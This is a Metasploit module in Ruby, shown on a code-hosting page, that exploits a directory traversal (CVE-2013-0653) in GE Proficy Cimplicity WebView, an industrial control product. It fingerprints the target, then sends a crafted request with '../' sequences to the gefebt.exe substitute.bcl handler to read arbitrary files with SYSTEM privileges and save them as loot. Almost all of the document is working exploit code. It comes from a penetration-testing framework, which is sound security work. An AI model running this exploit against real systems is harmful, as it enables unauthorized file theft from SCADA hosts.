Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/auxiliary/admin/scada/ge_proficy_substitute_traversal.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'uri'67class MetasploitModule < Msf::Auxiliary8include Msf::Exploit::Remote::Tcp9include Msf::Auxiliary::Report1011def initialize(info = {})12super(update_info(info,13'Name' => 'GE Proficy Cimplicity WebView substitute.bcl Directory Traversal',14'Description' => %q{15This module abuses a directory traversal in GE Proficy Cimplicity, specifically on the16gefebt.exe component used by the WebView, in order to retrieve arbitrary files with SYSTEM17privileges. This module has been tested successfully on GE Proficy Cimplicity 7.5.18},19'Author' =>20[21'Unknown', # Vulnerability discovery22'juan vazquez' # Metasploit module23],24'License' => MSF_LICENSE,25'References' =>26[27[ 'CVE', '2013-0653' ],28[ 'OSVDB', '89490' ],29[ 'BID', '57505' ],30[ 'URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-13-022-02' ]31],32'DisclosureDate' => '2013-01-22'))3334register_options(35[36Opt::RPORT(80),37OptString.new('TARGETURI',[true, 'Path to CimWeb', '/CimWeb']),38OptString.new('FILEPATH', [true, 'The name of the file to download', '/windows\\win.ini']),39# By default gefebt.exe installed on C:\Program Files\GE Fanuc\Proficy CIMPLICITY\WebPages\CimWeb40OptInt.new('DEPTH', [true, 'Traversal depth', 5])41])42end4344def normalize_uri(*strs)45new_str = strs * "/"4647new_str = new_str.gsub!("//", "/") while new_str.index("//")4849# Makes sure there's a starting slash50unless new_str[0,1] == '/'51new_str = '/' + new_str52end5354new_str55end5657def target_uri58begin59# In case TARGETURI is empty, at least we default to '/'60u = datastore['TARGETURI']61u = "/" if u.nil? or u.empty?62URI(u)63rescue ::URI::InvalidURIError64print_error "Invalid URI: #{datastore['TARGETURI'].inspect}"65raise Msf::OptionValidateError.new(['TARGETURI'])66end67end6869def my_basename(filename)70return ::File.basename(filename.gsub(/\\/, "/"))71end7273def is_proficy?74connect75req = "GET #{normalize_uri(target_uri.path, "index.html")} HTTP/1.0\r\n\r\n"76sock.put(req)77res = sock.get_once78disconnect7980if res and res =~ /gefebt\.exe/81return true82else83return false84end85end8687# We can't use the http client msf mixin because the Proficy Web server88# return a malformed HTTP response with the file contents, there aren't89# two new lines (but one) between the HTTP headers and the body content.90def read_file(file)91travs = ""92travs << "../" * datastore['DEPTH']93travs << file9495print_status("#{@peer} - Retrieving file contents...")9697connect98req = "GET #{normalize_uri(target_uri.path, "gefebt.exe")}?substitute.bcl+FILE=#{travs} HTTP/1.0\r\n\r\n"99sock.put(req)100res = sock.get_once101disconnect102103if res and res =~ /HTTP\/1\.0 200 OK/104return res105else106return nil107end108109end110111def run112@peer = "#{rhost}:#{rport}"113114print_status("#{@peer} - Checking if it's a GE Proficy Application...")115if is_proficy?116print_good("#{@peer} - Check successful")117else118print_error("#{@peer} - GE proficy not found")119return120end121122contents = read_file(datastore['FILEPATH'])123if contents.nil?124print_error("#{@peer} - File not downloaded")125return126end127128file_name = my_basename(datastore['FILEPATH'])129path = store_loot(130'ge.proficy.traversal',131'application/octet-stream',132rhost,133contents,134file_name135)136print_good("#{rhost}:#{rport} - File saved in: #{path}")137138end139end140141142